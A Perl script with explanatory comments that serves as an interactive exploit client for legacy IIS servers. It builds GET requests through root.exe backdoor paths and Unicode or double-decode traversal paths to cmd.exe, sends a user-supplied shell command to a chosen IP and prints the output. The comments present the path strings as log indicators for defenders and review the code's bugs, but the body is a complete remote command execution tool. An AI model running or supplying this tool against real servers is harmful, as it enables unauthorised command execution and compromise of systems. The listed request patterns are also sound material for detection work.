#!/usr/bin/perl -w
# Interactive client that builds a single HTTP request line from a menu of
# historical IIS paths (root.exe copies under /scripts and /MSADC, and
# URL-encoding / double-decoding traversals into winnt/system32/cmd.exe) and
# prints whatever the server sends back.
#
# From a defender's point of view the value of this listing is the path table
# itself: substrings such as `cmd.exe?/c+`, `root.exe?/c+`, `..%255c..`,
# `..%c0%af..`, `..%c1%1c..` and `..%%35%63..` in web-server access logs are
# high-fidelity indicators of this class of probe and are cheap to alert on.
# The affected server behaviour belongs to long-unsupported IIS versions;
# the request shapes, not the tool, are what is worth keeping.
#
# Style notes: no `use strict`, so every variable below is a package global;
# all STDIN reads are left un-chomp'ed, so $ip, $cmd and $method each carry a
# trailing newline into the code that uses them.
use IO::Socket::INET;

print "Enter IP: ";
$ip=<STDIN>;   # trailing newline retained and later passed straight into PeerAddr
print "Enter command: ";

# One request per command line; the loop ends when STDIN is exhausted.
while($cmd=<STDIN>) {
    # Menu of request prefixes. Each numbered entry corresponds to one
    # branch of the if-chain further down.
    print 'Choose method:',"\n";
    print '[1] /scripts/root.exe?/c+',"\n";
    print '[2] /MSADC/root.exe?/c+',"\n";
    print '[3] /c/winnt/system32/cmd.exe?/c+',"\n";
    print '[4] /d/winnt/system32/cmd.exe?/c+',"\n";
    print '[5] /scripts/..%255c../winnt/system32/cmd.exe?/c+',"\n";
    print '[6] /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+',"\n";
    print '[7] /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+',"\n";
    print '[8] /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+',"\n";
    print '[9] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+',"\n";
    print '[10] /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+',"\n";
    print '[11] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+',"\n";
    print '[12] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+',"\n";
    print '[13] /scripts/..%%35%63../winnt/system32/cmd.exe?/c+',"\n";
    print '[14] /scripts/..%%35c../winnt/system32/cmd.exe?/c+',"\n";
    print '[15] /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+',"\n";
    print '[16] /scripts/..%252f../winnt/system32/cmd.exe?/c+',"\n";

    # Numeric `==` on the raw line; "3\n" numifies to 3, anything that does
    # not numify to 1..16 matches no branch and $cmd is sent exactly as typed.
    $method=<STDIN>;

    # Because $cmd still ends in "\n", every assembled request has that
    # newline between the command text and the literal ' HTTP/1.0'.
    if($method == 1){ $cmd = 'GET /scripts/root.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 2){ $cmd = 'GET /MSADC/root.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 3){ $cmd = 'GET /c/winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 4){ $cmd = 'GET /d/winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 5){ $cmd = 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 6){ $cmd = 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 7){ $cmd = 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    # NOTE: in the original source this single-quoted literal spans a line
    # break, so for method 8 the request text ends in " \nHTTP/1.0" rather
    # than " HTTP/1.0". Kept byte-for-byte.
    if($method == 8){ $cmd = 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+'.$cmd.' 
HTTP/1.0'; }
    if($method == 9){ $cmd = 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 10){ $cmd = 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 11){ $cmd = 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 12){ $cmd = 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 13){ $cmd = 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 14){ $cmd = 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 15){ $cmd = 'GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }
    if($method == 16){ $cmd = 'GET /scripts/..%252f../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0'; }

    # Echo the exact bytes about to go on the wire (useful when reproducing
    # the log line this traffic generates on the server side).
    print $cmd."\n";

    # Mixes indirect-object `new ...` with an explicit `->new(...)`; the plain
    # `IO::Socket::INET->new(...)` form is the unambiguous spelling. The `die`
    # message omits $@/$!, so a failure gives no reason.
    $socket=new IO::Socket::INET->new(PeerPort=>80,Proto=>'tcp',PeerAddr=>$ip) or die('Connection failed');
    $socket->send($cmd);

    # Read until the peer closes (recv returns an empty string). If recv
    # itself fails $text may be undef, which `ne ''` would warn about under -w
    # — not handled here.
    $socket->recv($text,1048576);
    while($text ne '') {
        print $text;
        $socket->recv($text,1048576);
    }
    # Only the read side is shut down; the handle is never explicitly closed
    # and is simply overwritten on the next iteration.
    $socket->shutdown(0);
    print "\n\nEnter command: ";
}